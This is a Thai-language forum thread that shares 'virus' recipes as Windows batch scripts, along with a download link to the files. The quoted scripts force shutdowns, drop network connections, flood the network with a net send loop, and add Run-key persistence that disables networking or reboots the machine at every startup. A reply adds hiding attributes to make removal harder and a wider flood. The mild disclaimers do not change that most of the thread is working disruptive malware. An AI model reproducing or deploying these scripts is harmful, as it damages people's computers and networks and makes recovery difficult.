# Notification.
Notification

Author Topic: ความรู้ทั่วไปเกี่ยวกับไวรัสครับ และวิธีทำเป็น ตัวอย่างง่ายๆ!!! (ด้านมืด)  (Read 5438 times)

0 Members and 1 Guest are viewing this topic.

Offline PokPak MaTem

  • VPC Member
  • ***
  • Posts: 511
  • QR-CODE ของเว็บ Varietypc.Net
    • MSN Messenger - kuytiao_pak@hotmail.com
    • View Profile
    • Email
เพื่อนมันทำก็เลยจัดการเอามาซะเลย อิอิ เอาไปดูครับ มีตัวอย่างไวรัส และวิธีทำ ดูในนั้นเลย

ส่วนไฟล์มันนั้นจะเป็นไฟล์ไวรัสโดยไม่ผ่านการ Autorun นะ เอาไปศึกษาดู สบายใจ แต่ถ้าคลิ๊กเอง ไม่รับรอง [emo12] [emo11]

http://sv1.uploadfile.biz/get.php?file=269682214529



ข้างในนะ วิธีอย่างย่อ
Quote
--ระดับไม่ค่อยรุนแรง--

ไวรัส #1 กดแล้ว ปิดเครื่อง
ตัวนี้ไม่มีไรมาก แค่ดับเบิลคลิกมัน เครื่องก็ ชัตดาวน์ทันที ไม่ทำลายข้อมูลใด ๆ ทั้งสิ้น

Code:
@echo off
TITLE Mr_Unlocker
shutdown -r -f -t 0

ไวรัส # 2 ตัดการเชื่อมต่ออินเตอร์เน็ต/เน็ตเวิร์ก
อันนี้แรงขึ้นมาหน่อย จะตัดการทำงานของอินเตอร์เน็ตชั่วขณะ
Code:
@echo off
TITLE Mr_Unlocker
ipconfig /release



Virus#3 Combo Virus
ตัวนี้จะมีความต่อเนื่องจากสองตัวข้างบน คือ เมื่อคลิกแล้ว จะทำ flood network และการทำงานจะวน loop จนเน็ตเวิร์กเดี้ยง

Code:
@echo off
TITLE Mr_Unlocker :CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
--ระดับรุนแรง ( มาก )--

Virus#4 Disble IP Address
โดนตัวนี้เข้าไปก็อย่าหวังเลยว่าจะเข้าอินเตอร์เน็ตไ ด้อีก

Code:
@echo off
break off
TITLE Unlocker Hackers
echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo Unlocker Hackers Strike Again
PAUSE



Virus#5 สั่งปิดเครื่องทุกๆครั้งที่เปิดจนถึง11วินาที (เปิดแล้วก็ปิดอยู่อย่างนั้น)

code:
@echo off
break off
TITLE Unlocker Hackers
echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f
echo Unlocker Hackers Strike Again
PAUSE

---------------------------------------



Offline microsoft

  • Administrator
  • *****
  • Posts: 8651
    • View Profile
    • VarietyPC.Net
ง่ะ กำ แล้วใครจะลองล่ะครับ เขียนได้ก็ขอวิธีแก้ด้วยก็ดีนะครับ เผื่อใครเอาไปลองแล้วหาวิธีแก้ไม่ได้ มีหวังฟอร์แมตลงใหม่ลูกเดียวเลย แต่ก็ขอเก็บไว้ศึกษาหน่อยนะครับ  [emo03]  [emo05]

ขอบคุณมากครับท่าน  [emo22]  [emo22]
การให้ที่ยิ่งใหญ่ คือ... การให้ต่อไป.... ไม่สิ้นสุด

Offline PokPak MaTem

  • VPC Member
  • ***
  • Posts: 511
  • QR-CODE ของเว็บ Varietypc.Net
    • MSN Messenger - kuytiao_pak@hotmail.com
    • View Profile
    • Email
เพื่อนมันทำ สงสัยต้องถามเพื่อนมันก่อน

เห็นมันว่า มันสร้าง Trojan วงแลน เองได้แล้วด้วย เพิ่งเสร็จยังไม่สมบูรณ์นัก แต่เด๋วจะเอามาครับ
น่าจะได้ใกล้ๆนี้ ส่งทาง PM นะครับ


มันเป็น Mod ของ www.ov3rsky.com แน่ะ  [emo13]
ชื่อว่า ThanaSoft หาได้ไม่ยาก เด่นเลย  [emo13]

Offline fantasy ಠ-ಠ

  • ผู้รู้ ผู้ตื่น ผู้เบิกบาน
  • N/A
  • *****
  • Posts: 4491
  • เมื่อวานรู้ วันนี้ก็รู้ แต่... พรุ่งนี้ไม่รู้
    • ICQ Messenger - 2484607
    • View Profile
    • iPlusZone.com
เป็นการเล่นคำสั่ง กับ Batch ล้วน ๆ

อันแรกก็น่าใช้สำหรับคอมฯที่ปิดเครื่องช้า
แต่คิดว่ากด Power ทีนึง จะปิดเร็วกว่าอ่ะ [emo01]

อันสอง เป็นการใช้คำสั่ง ipconfig เพื่อขอไอพีใหม่ ใช้บ่อย

อันสาม ถ้าเครื่องอยู่ในกลุ่มชื่อ workgroup ซึ่งก็เป็นซะส่วนใหญ่
แต่ถ้าอยู่บนโดเมน หรือว่าชื่อกลุ่มเปลี่ยนไปเป็นชื่ออื่น ก็ไม่มีอันตราย
วิธีจะทำให้เดือดร้อนกว่านี้ น่าจะเป็น

Quote
Code :
@echo off
TITLE Mr_Unlocker
:CRASH
net send * * ENABLED
net send * * ENABLED
GOTO CRASH

[emo06]

อันสี่ จะเป็นการเล่น คำสั่งบน Batch แต่ไปเพิ่มใน Registry
วิธีการนี้ จะแก้ได้ก็ต้องหาแผ่น PE มาแก้ไข Registry ให้ได้ก่อน
ไม่ก็แค่ลบไฟล์ wimn32.bat ... ว่าแต่ว่า ถ้าใช้คำสั่งเปลี่ยนชื่อไฟล์เพิ่มลงไปอีกนิด จะทำให้แก้ไขได้ยากขึ้นอีก [emo13] งานเข้านะเนี่ย [emo12]

Quote
Code:
@echo off
break off
TITLE Unlocker Hackers
echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
attrib +s +h +r c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo Unlocker Hackers Strike Again
PAUSE

อันห้า
จะบอกว่าคล้าย ๆ อันหนึ่ง มาประยุกต์รวมกับอันสี่

Quote
code:
@echo off
break off
TITLE Unlocker Hackers
echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
attrib +s +h +r c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f
echo Unlocker Hackers Strike Again
PAUSE

ยังไงก็อย่าได้ไปเอาไปแกล้งคนอื่น ๆ เลยนะ มันไม่ดีน่ะ [emo11]
รู้ไว้ ใช้ศึกษา
เล่นเอง พังเอง แก้ไขปัญหาเอง จะดีกว่าไปทำคนอื่นเดือดร้อน [emo01]

งานจะเข้าไหมเนี่ย เข้ามาแ้ก้ข้อผิดพลาดให้น่ะ

Offline PokPak MaTem

  • VPC Member
  • ***
  • Posts: 511
  • QR-CODE ของเว็บ Varietypc.Net
    • MSN Messenger - kuytiao_pak@hotmail.com
    • View Profile
    • Email



 

Sitemap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27